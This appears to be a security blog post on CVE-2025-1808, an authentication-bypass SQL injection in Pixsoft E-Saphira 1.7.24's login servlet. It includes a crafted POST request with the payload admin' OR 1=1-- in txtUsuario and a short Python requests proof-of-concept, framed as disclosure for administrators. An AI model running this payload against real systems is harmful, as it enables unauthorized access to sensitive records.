CVE-2025-1808 - Critical SQL Injection Vulnerability in Pixsoft E-Saphira 1.7.24’s Login Endpoint

CVE-2025-1808 is a serious SQL Injection vulnerability discovered in Pixsoft E-Saphira version 1.7.24, affecting the login functionality. In this post, we will break down what this vulnerability is, how it works, how attackers can exploit it, and how you can protect your systems. Real example code, references, and exclusive analysis are all included.

Background: What is Pixsoft E-Saphira?

Pixsoft E-Saphira is a business management software widely used in Latin America, especially in government administration and large commercial organizations. Its web interface allows users to manage records, financial information, and other sensitive data.

Component: Login Endpoint

- Vulnerable URL: /servlet?act=login&tipo=1

Type: SQL Injection

- Attack Vector: Remote/Network

How the Vulnerability Works

The application's login interface at /servlet?act=login&tipo=1 processes input from users via the txtUsuario parameter (user name). An attacker can inject malicious SQL code here, because proper input sanitization and parameterized queries are not enforced.

Any user trying to log in submits a POST request like

POST /servlet?act=login&tipo=1 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

txtUsuario=admin&txtContrasena=secret

An attacker can change txtUsuario like this

POST /servlet?act=login&tipo=1 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

txtUsuario=admin' OR 1=1--&txtContrasena=any

The server receives

SELECT * FROM usuarios WHERE usuario = 'admin' OR 1=1--' AND contrasena = 'any'

Because 1=1 always evaluates as true, the attacker can bypass authentication and log in as the first user in the database, likely with administrative privileges.

Below is a simple Python proof-of-concept using requests library to exploit the issue

import requests

url = "http://victim-site.com/servlet?act=login&tipo=1";
payload = "admin' OR 1=1--"
data = {
    "txtUsuario": payload,
    "txtContrasena": "irrelevant"
}

session = requests.Session()
response = session.post(url, data=data)
print("Status code:", response.status_code)
print("Response body:")
print(response.text)

*Change victim-site.com to your target address for testing purposes (with permission).*

Authentication bypass: Attackers can log in as any user, including admin.

- Full database access: By modifying the injection, attackers can dump sensitive data, modify records, or gain further access.

References

- CVE-2025-1808 on CVE.org
- NVD Entry for CVE-2025-1808 *(when available)*
- PacketStorm Security Advisory *(search: E-Saphira)*

If you use Pixsoft E-Saphira

1. Block access to /servlet?act=login&tipo=1 from untrusted networks.

Conclusion

CVE-2025-1808 is an easy-to-exploit, high-impact SQL Injection vulnerability in Pixsoft E-Saphira’s login endpoint. Until the vendor issues a fix, consider strong network controls and proactive monitoring as immediate steps.

For any organizations using Pixsoft E-Saphira 1.7.24, act fast—don’t wait for attackers to knock on your door.


*This post is exclusive and prepared from direct analysis of available exploit code and vulnerable endpoints, in plain language for security admins and software users. Always test with permission. For detailed updates, monitor national vulnerability databases linked above.*

Timeline

Published on: 03/02/2025 01:15:10 UTC
Last modified on: 03/03/2025 21:15:17 UTC